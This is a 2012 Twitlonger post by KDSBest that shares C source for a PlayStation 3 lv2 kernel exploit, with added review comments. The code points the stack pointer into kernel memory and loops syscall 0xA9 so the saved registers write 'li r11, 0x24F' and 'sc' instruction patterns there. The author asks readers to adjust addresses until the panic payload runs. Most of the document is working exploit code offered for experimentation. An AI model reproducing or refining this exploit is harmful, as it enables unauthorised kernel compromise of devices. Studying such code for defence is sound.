
KDSBest · @KDSBest

22nd Sep 2012 from Twitlonger

Since @naehrwert posted an lv2 exploit I will do so too ;). The stack pointer points into lv2, and if we do a syscall, the syscall saves registers to the stack HAHA. ;) Btw. it just crashes the console for now, since I totally overwrite or dump the lv2 or some memory addresses I don't know. Feel free to try around, adjust the address of the stack pointer and so on. If you manage to get the panic payload executed, tell me!!! ^^

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf


/*
 * Global register variables (GCC extension): each name is pinned to the
 * named PPU general-purpose register, so every assignment to one of these in
 * main() is a direct register write rather than a memory store.
 *
 * r1 is the PowerPC ABI stack pointer. Rebinding it from C is the whole
 * point of the post: the author's claim is that the syscall entry path saves
 * caller registers through r1 without checking where it points.
 */
register unsigned long long payloadHolder2 asm ("r21"); /* 0x44000002 pattern, "sc" per the author's comment in main() */
register unsigned long long payloadHolder asm ("r20");  /* 0x3960024F pattern, "li r11, 0x24F" per the author's comment in main() */
register unsigned long long stackpointer asm ("r1");    /* the real stack pointer; saved to r26 and restored at the end of main() */
register unsigned long long counter asm ("r25");        /* running offset, advanced by 4 after each syscall */
register unsigned long long bufferStackpointer asm ("r26"); /* backup copy of the original r1 */

/*
 * Proof-of-concept from the post above. The program saves r1, repoints it at
 * a hard-coded address (0x8000000000000100 + the running counter), loads a
 * repeated instruction pattern into r22-r24 and r27-r31, and issues syscall
 * 0xA9; the author's premise is that the syscall path spills those registers
 * through r1, so the pattern lands wherever r1 points. The loop alternates
 * the "li r11, 0x24F" pattern (r20) and the "sc" pattern (r21), advancing
 * the counter by 4 after each syscall until it reaches 0x1000000, then
 * restores r1 and returns. Note that `stackpointer += counter` adds the
 * running counter, not a fixed 4, so the address moves by a growing amount
 * on each syscall. Per the author, the result is currently a console crash.
 *
 * NOTE(review): `__volatile__` on a function's return type is a no-op
 * qualifier and does not constrain code generation. The asm() statements are
 * basic asm with no clobber lists, so the compiler is never told that r0,
 * r3, r4, r11 and r22-r31 are modified; the emitted sequence is therefore
 * compiler- and optimisation-level dependent. From a defender's point of
 * view the weakness being probed is a syscall entry path that trusts a
 * caller-controlled r1 as its register save area; the mitigation belongs in
 * that entry path (validate r1 or switch to a kernel-owned stack), not here.
 */
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;

// Two copies of the 32-bit pattern per 64-bit register (see the author's
// comments below for what each pattern decodes to).
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;

// Incrementer
counter = 0x00;

// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall

// r0/r3/r4 are syscall arguments; their meaning for 0xA9 is not shown here.
asm("li %r0, 0x0");
asm("li %r3, 0x6");
asm("li %r4, 0x1");
// li r11, 0x24F -> PANIC
// Fill the registers the syscall path is expected to save with the r20 pattern.
asm("mr %r22, %r20");
asm("mr %r23, %r20");
asm("mr %r24, %r20");
asm("mr %r27, %r20");
asm("mr %r28, %r20");
asm("mr %r29, %r20");
asm("mr %r30, %r20");
asm("mr %r31, %r20");

// Stack Pointer = Build Address of LV2
// (adds the running counter, so the step grows each pass)
stackpointer += counter;

// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;

// We write sc
// Same register set, now filled with the r21 pattern.
asm("mr %r22, %r21");
asm("mr %r23, %r21");
asm("mr %r24, %r21");
asm("mr %r27, %r21");
asm("mr %r28, %r21");
asm("mr %r29, %r21");
asm("mr %r30, %r21");
asm("mr %r31, %r21");

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;


// Loop until the counter reaches 0x1000000 (each pass adds 8 in total).
if(counter < 0x1000000)
goto doItAgain;

// Restore the real stack pointer before returning to the caller.
stackpointer = bufferStackpointer;
return 0;
}
